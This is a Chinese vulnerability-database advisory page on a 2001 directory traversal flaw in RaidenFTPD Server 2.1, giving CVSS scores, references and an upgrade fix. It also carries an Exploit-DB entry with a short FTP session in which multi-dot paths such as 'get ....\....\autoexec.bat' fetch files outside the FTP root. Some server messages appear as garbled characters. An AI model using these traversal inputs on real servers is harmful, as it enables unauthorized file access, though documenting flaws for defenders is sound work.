发布时间 :2001-06-27 00:00:00
修订时间 :2008-09-05 16:24:14

[原文]Directory traversal vulnerability in RaidenFTPD Server 2.1 before build 952 allows attackers to access files outside the ftp root via dot dot attacks, such as (1) .... in CWD, (2) .. in NLST, or (3) ... in NLST.

[CNNVD]RaidenFTPD Server目录遍历漏洞(CNNVD-200106-128)

        RaidenFTPD Server 2.1版本build 952之前版本存在目录遍历漏洞。攻击者可以借助如(1)CWD中的....,(2)NLST中的..或(3)NLST的...的点 点攻击访问ftp根目录的外部文件。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(VENDOR_ADVISORY)  BUGTRAQ  20010425 Vulnerabilities in RaidenFTPD Server
(UNKNOWN)  XF  raidenftpd-dot-directory-traversal(6455)

- 漏洞信息

RaidenFTPD Server目录遍历漏洞
中危 路径遍历
2001-06-27 00:00:00 2005-10-20 00:00:00
        RaidenFTPD Server 2.1版本build 952之前版本存在目录遍历漏洞。攻击者可以借助如(1)CWD中的....,(2)NLST中的..或(3)NLST的...的点 点攻击访问ftp根目录的外部文件。

- 公告与补丁


- 漏洞信息 (20803)

RaidenFTPD 2.1 Directory Traversal Vulnerability (EDBID:20803)
windows remote
2001-04-25 Verified
0 joetesta
N/A [点击下载]

Raiden FTPD is susceptible to directory traversal attacks using multiple dots in submitted commands specifying file paths.

If the request is properly composed, RaidenFTPD will serve files outside of the intended webroot, potentially compromising the privacy of user data and/or obtaining information which could be used to further compromise the host. 

> ftp localhost
220-This FTP site is running free version of RaidenFTPD
220-Download chinese version from
220-Download english version from
220-RaidenFTPD32 for RaidenFTPD (up since 2001/04/20 15:00)
220-This server is for private use only
220-If you do not have access to this server
220-Please disconnect now
220 Please enter your login name now.
User ( jdog
331 Password required for jdog .
[really long login banner edited out]
230 User jdog logged in , proceed.
ftp> get ....\....\autoexec.bat
200 Port command ok.
150 Sending /....\....\autoexec.bat (419 bytes). Mode STREAM Type ASCII
226-�+ª+¦s+uññ_zª@ ñU¦¦ : 419 ª_ñ+_+ ñW¦¦ : 0 ª_ñ+_+
226-¦¦½�ñ@ª+ñU¦¦¬¦¦t½+¼O : 419 kb/sec _zª¦ Unlimited kb ¬¦ñU¦¦+B½+
226-�+½e¬¦�++²¼O /
226 Transfer finished successfully. Data connection closed.
ftp: 419 bytes received in 0.27Seconds 1.55Kbytes/sec.
ftp> cd ....
250-ª¦�++²¦-ñU¬+¦í 1323 mb
250 "/.." is current directory. 		

- 漏洞信息

RaidenFTPD Multiple Command Traversal Arbitrary File Access
Remote / Network Access Information Disclosure
Loss of Confidentiality Upgrade
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2001-04-26 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 2.1 Build 952 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete